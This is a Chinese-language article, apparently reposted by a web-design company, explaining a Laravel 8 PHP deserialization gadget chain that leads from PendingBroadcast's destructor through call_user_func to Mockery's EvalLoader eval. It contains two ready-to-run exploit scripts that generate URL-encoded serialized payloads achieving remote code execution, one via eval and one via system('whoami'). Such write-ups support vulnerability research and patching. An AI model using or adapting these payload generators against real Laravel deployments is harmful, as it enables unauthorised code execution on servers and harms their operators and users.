本篇文章為大家展示了Laravel 8中怎么實(shí)現(xiàn)反序列化，內(nèi)容簡(jiǎn)明扼要并且容易理解，絕對(duì)能使你眼前一亮，通過(guò)這篇文章的詳細(xì)介紹希望你能有所收獲。

本篇文章為大家展示了Laravel 8中怎么實(shí)現(xiàn)反序列化，內(nèi)容簡(jiǎn)明扼要并且容易理解，絕對(duì)能使你眼前一亮，通過(guò)這篇文章的詳細(xì)介紹希望你能有所收獲。

text

公司主營(yíng)業(yè)務(wù)：成都做網(wǎng)站、網(wǎng)站建設(shè)、移動(dòng)網(wǎng)站開(kāi)發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競(jìng)爭(zhēng)能力。創(chuàng)新互聯(lián)建站是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開(kāi)放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化，感謝他們對(duì)我們的高要求，感謝他們從不同領(lǐng)域給我們帶來(lái)的挑戰(zhàn)，讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來(lái)驚喜。創(chuàng)新互聯(lián)建站推出化州免費(fèi)做網(wǎng)站回饋大家。

首先還是老樣子，熟悉laravel的pop鏈的師傅肯定比較熟悉，入口點(diǎn)還是PendingBroadcast.php中的析構(gòu)函數(shù)；

public function __destruct(){    $this->events->dispatch($this->event);}

這里很明顯可以控制任意類(lèi)下的dispatch函數(shù)；這里還是選擇Dispatcher.php進(jìn)行續(xù)鏈；

public function dispatch($command){    return $this->queueResolver && $this->commandShouldBeQueued($command)                    ? $this->dispatchToQueue($command)                    : $this->dispatchNow($command);}

這里簡(jiǎn)單的看下源碼，感興趣的師傅可以拿著laravel5的源碼來(lái)進(jìn)行對(duì)比，這里只不過(guò)是寫(xiě)成了三元運(yùn)算的形式，本質(zhì)上還是一樣的，我們控制queueResolver變量和commandShouldBeQueued函數(shù)，使其返回為真，這樣就可進(jìn)入dispatchToQueue函數(shù)；這里審計(jì)下類(lèi)不難發(fā)現(xiàn)queueResolver是我們可控的變量，然而commandShouldBeQueued函數(shù)我們可以追溯一下；

protected function commandShouldBeQueued($command){    return $command instanceof ShouldQueue;}

這里不難發(fā)現(xiàn)，是需要我們的command是繼承ShouldQueue接口的類(lèi)就可；所以全局搜索；選擇BroadcastEvent.php的類(lèi)；然后便可返回true，然后進(jìn)入dispatchToQueue函數(shù)；回溯一下dispatchToQueue函數(shù)；

public function dispatchToQueue($command)    {        $connection = $command->connection ?? null;        $queue = call_user_func($this->queueResolver, $connection);

可以發(fā)現(xiàn)這里有個(gè)危險(xiǎn)函數(shù)call_user_func；可以直接實(shí)現(xiàn)任意類(lèi)下的任意方法；這里就可直接跳轉(zhuǎn)到我們想要執(zhí)行的方法下；全局搜索一下eval方法；發(fā)現(xiàn)存在；

class EvalLoader implements Loader{    public function load(MockDefinition $definition)    {        if (class_exists($definition->getClassName(), false)) {            return;        }        eval("?>" . $definition->getCode());    }}

call_user_func函數(shù)在第一個(gè)參數(shù)為數(shù)組的時(shí)候，第一個(gè)參數(shù)就是我們選擇的類(lèi)，第二個(gè)參數(shù)是類(lèi)下的方法；所以這里直接去到EvalLoader類(lèi)，去執(zhí)行l(wèi)oad方法從而調(diào)用到eval函數(shù)；這里發(fā)現(xiàn)存在參數(shù)，而且參數(shù)必須是MockDefinition類(lèi)的實(shí)例；也即是意味著我們connection需要為MockDefinition類(lèi)的實(shí)例；

繼續(xù)審計(jì)發(fā)現(xiàn)，必須if為false才會(huì)觸發(fā)eval方法；所以這里我們需要直接追溯到MockDefinition類(lèi)中；

class MockDefinition{    protected $config;    protected $code;    public function __construct(MockConfiguration $config, $code)    {        if (!$config->getName()) {            throw new \InvalidArgumentException("MockConfiguration must contain a name");        }        $this->config = $config;        $this->code = $code;    }    public function getConfig()    {        return $this->config;    }    public function getClassName()    {        return $this->config->getName();    }    public function getCode()    {        return $this->code;    }}

看下getClassName函數(shù)；這里的config是可控的，所以我們直接找到一個(gè)存在getName方法并且可控該方法的類(lèi)；全局搜索下找到MockConfiguration.php可以實(shí)現(xiàn)；

protected $name;    public function getName()    {        return $this->name;    }

因?yàn)樽詈笫且?jīng)過(guò)class_exit函數(shù)的判斷的，所以我們可以直接控制其返回一個(gè)不存在的類(lèi)，就會(huì)造成false從而進(jìn)入eval方法；繼續(xù)回到eval方法；

class EvalLoader implements Loader{    public function load(MockDefinition $definition)    {        if (class_exists($definition->getClassName(), false)) {            return;        }        eval("?>" . $definition->getCode());    }}

這里還有個(gè)getCode方法，我們通過(guò)上面的類(lèi)也可審計(jì)getCode方法；code在MockDefinition類(lèi)中也是可控的，所以我們可以隨意的控制其內(nèi)容，那么我們就可命令執(zhí)行；放出我exp：

<?phpnamespace Illuminate\Broadcasting{use Illuminate\Contracts\Events\Dispatcher;class PendingBroadcast{ protected $event; protected $events;    public function __construct($events, $event)    {        $this->event = $event;        $this->events = $events;    }}}namespace Illuminate\Bus{class Dispatcher{ protected $queueResolver;    public function __construct($queueResolver)    {        $this->queueResolver = $queueResolver;    }}}namespace Illuminate\Broadcasting{class BroadcastEvent{ public $connection; public function __construct($connection)    {        $this->connection = $connection;    } }}namespace Mockery\Loader{use Mockery\Generator\MockDefinition;class EvalLoader{     public function load(MockDefinition $definition)    {}}}namespace Mockery\Generator{class MockConfiguration{ protected $name; public function __construct($name){ $this->name = $name;}}}namespace Mockery\Generator{class MockDefinition{ protected $config; protected $code; public function __construct($config,$code)    {     $this->config = $config;     $this->code = $code;    }}}namespace{ $e = new Mockery\Generator\MockConfiguration('s1mple'); $d = new Mockery\Loader\EvalLoader(); $f = new Mockery\Generator\MockDefinition($e,'<?php phpinfo();?>'); $c = new Illuminate\Broadcasting\BroadcastEvent($f); $a = new Illuminate\Bus\Dispatcher(array($d,"load")); $b = new Illuminate\Broadcasting\PendingBroadcast($a,$c); echo urlencode(serialize($b));}

這里為了節(jié)省時(shí)間，我最后用abcdef直接代替了，造成rce；

細(xì)心的師傅想必也發(fā)現(xiàn)了；在最開(kāi)始的call_user_func處，也是可以進(jìn)行命令執(zhí)行的；

public function dispatchToQueue($command)    {        $connection = $command->connection ?? null;        $queue = call_user_func($this->queueResolver, $connection);

這里可以直接控制進(jìn)行命令執(zhí)行；這個(gè)很簡(jiǎn)單，就直接放出我exp吧；

<?phpnamespace Illuminate\Broadcasting{use Illuminate\Contracts\Events\Dispatcher;class PendingBroadcast{ protected $event; protected $events;    public function __construct($events, $event)    {        $this->event = $event;        $this->events = $events;    }}}namespace Illuminate\Bus{class Dispatcher{ protected $queueResolver;    public function __construct($queueResolver)    {        $this->queueResolver = $queueResolver;    }}}namespace Illuminate\Broadcasting{class BroadcastEvent{ public $connection; public function __construct($connection)    {        $this->connection = $connection;    } }}namespace{ $c = new Illuminate\Broadcasting\BroadcastEvent('whoami'); $a = new Illuminate\Bus\Dispatcher('system'); $b = new Illuminate\Broadcasting\PendingBroadcast($a,$c); echo urlencode(serialize($b));}

網(wǎng)頁(yè)標(biāo)題：Laravel8中怎么實(shí)現(xiàn)反序列化
當(dāng)前鏈接：http://jinyejixie.com/article40/cipoho.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供做網(wǎng)站、云服務(wù)器、用戶體驗(yàn)、Google、網(wǎng)站制作、網(wǎng)站策劃

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)